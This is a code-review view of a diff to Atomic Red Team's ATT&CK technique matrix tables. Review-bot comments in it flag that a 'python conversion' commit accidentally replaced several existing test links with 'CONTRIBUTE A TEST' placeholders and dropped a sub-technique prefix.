| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | |
| | | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Office Application Startup: Office Template Macros.](../../T1137.001/T1137.001.md) | [Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | [Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | |
| | | Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Emond](../../T1546.014/T1546.014.md) | [Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md) | [OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md) | | | | | | |
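Review bot: `[Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md)` becomes `Domain Controller Authentication [CONTRIBUTE A TEST]` here, and the same cell recurs in the `@@ -102,7 +102,7 @@` and `@@ -176,7 +176,7 @@` hunks below, so one missed lookup for T1556.001 propagates to every tactic column the technique sits in. Fixing the lookup once will resolve all three; a test asserting that any technique ID present under the atomics tree renders as a link in every column it appears in would catch this class of bug.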
@@ -82,7 +82,7 @@
| | | Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | | | | | | | |
| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md) | | | | | | | |
| | | Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | | |
| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md) | | | | | | | |
| | | [IIS Components](../../T1505.004/T1505.004.md) | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | [File and Directory Permissions Modification](../../T1222/T1222.md) | | | | | | | |
| | | [Event Triggered Execution](../../T1546/T1546.md) | [Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md) | Junk Code Insertion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
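Review bot: `[Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md)` becomes `Python Startup Hooks [CONTRIBUTE A TEST]` here and again in the `@@ -94,7 +94,7 @@` hunk below; T1546.018 should remain linked. Since every changed cell in this diff follows the same pattern (link replaced by placeholder, prefix dropped), the commit message `python conversion` should state whether any test-to-technique mapping intentionally changed; as it stands the diff reads as accidental data loss in the port.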
@@ -94,7 +94,7 @@
| | | [Boot or Logon Initialization Scripts: Startup Items](../../T1037.005/T1037.005.md) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Cloud Application Integration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: Python Startup Hooks](../../T1546.018/T1546.018.md) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | Python Startup Hooks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Re-opened Applications](../../T1547.007/T1547.007.md) | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | | |
| | | Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Manipulation: Additional Email Delegate Permissions](../../T1098.002/T1098.002.md) | Extended Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [BITS Jobs](../../T1197/T1197.md) | TCC Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
@@ -102,7 +102,7 @@
| | | Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: ListPlanting](../../T1055.015/T1055.015.md) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | [Create or Modify System Process: Launch Agent](../../T1543.001/T1543.001.md) | Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | |
| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | |
| | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md) | [Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | |
| | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | | | | | | | |
| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md) | [Plist File Modification](../../T1647/T1647.md) | | | | | | | |
| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | Udev Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | JamPlus [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
@@ -176,7 +176,7 @@
| | | | | Patch System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [Modify Authentication Process: Domain Controller Authentication](../../T1556.001/T1556.001.md) | | | | | | | |
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
| | | | | Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+10 -10
View File
@@ -3,14 +3,14 @@
|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|
| [External Remote Services](../../T1133/T1133.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | [Process Injection: Extra Window Memory Injection](../../T1055.011/T1055.011.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | Remote Services:VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Windows Management Instrumentation](../../T1047/T1047.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md) | Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution: Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Link](../../T1566.002/T1566.002.md) | [Server Software Component](../../T1129/T1129.md) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Replication Through Removable Media](../../T1091/T1091.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Phishing: Spearphishing Attachment](../../T1566.001/T1566.001.md) | [Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Signed Binary Proxy Execution: Rundll32](../../T1218.011/T1218.011.md) | [OS Credential Dumping](../../T1003/T1003.md) | [Group Policy Discovery](../../T1615/T1615.md) | [Remote Services: SMB/Windows Admin Shares](../../T1021.002/T1021.002.md) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol: DNS](../../T1071.004/T1071.004.md) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | [Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal Web Session Cookie](../../T1539/T1539.md) | [Device Driver Discovery](../../T1652/T1652.md) | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Sharepoint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Replication Through Removable Media](../../T1091/T1091.md) | [User Execution: Malicious File](../../T1204.002/T1204.002.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Audio Capture](../../T1123/T1123.md) | [Automated Exfiltration](../../T1020/T1020.md) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Supply Chain Compromise](../../T1195/T1195.md) | Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [External Remote Services](../../T1133/T1133.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Signed Script Proxy Execution: Pubprn](../../T1216.001/T1216.001.md) | [Brute Force: Password Cracking](../../T1110.002/T1110.002.md) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Pre-OS Boot: System Firmware](../../T1542.001/T1542.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: LSA Secrets](../../T1003.004/T1003.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Application Layer Protocol](../../T1071/T1071.md) | [Service Stop](../../T1489/T1489.md) |
| [Content Injection](../../T1659/T1659.md) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | [Content Injection](../../T1659/T1659.md) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Native API](../../T1106/T1106.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Direct Volume Access](../../T1006/T1006.md) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Data from Removable Media](../../T1025/T1025.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | [Remote Access Software](../../T1219/T1219.md) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over C2 Channel](../../T1041/T1041.md) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Input Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Obfuscated Files or Information: Encrypted/Encoded File](../../T1027.013/T1027.013.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Sniffing](../../T1040/T1040.md) | [Software Deployment Tools](../../T1072/T1072.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter](../../T1059/T1059.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Databases [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | [Masquerading: Double File Extension](../../T1036.007/T1036.007.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
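Review bot: the two rewritten Content Injection cells (first and eleventh columns of the two changed rows) drop the existing link to ../../T1659/T1659.md and replace it with the CONTRIBUTE A TEST placeholder, even though the old rows prove that test page exists; for a change described only as "python conversion" that reads as the new generator failing to match T1659 to its tests rather than an intended content change. The Domain Generation Algorithms cell also loses its "Dynamic Resolution:" parent prefix while cells in the same row keep theirs (Phishing: Spearphishing Link, Brute Force: Password Guessing), so the rendered matrix now mixes prefixed and unprefixed sub-technique names.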
@@ -23,9 +23,9 @@
| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
| Wi-Fi Networks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Process Injection](../../T1055/T1055.md) | [Hide Artifacts](../../T1564/T1564.md) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | Virtual Machine Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay](../../T1557.001/T1557.001.md) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Bombing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
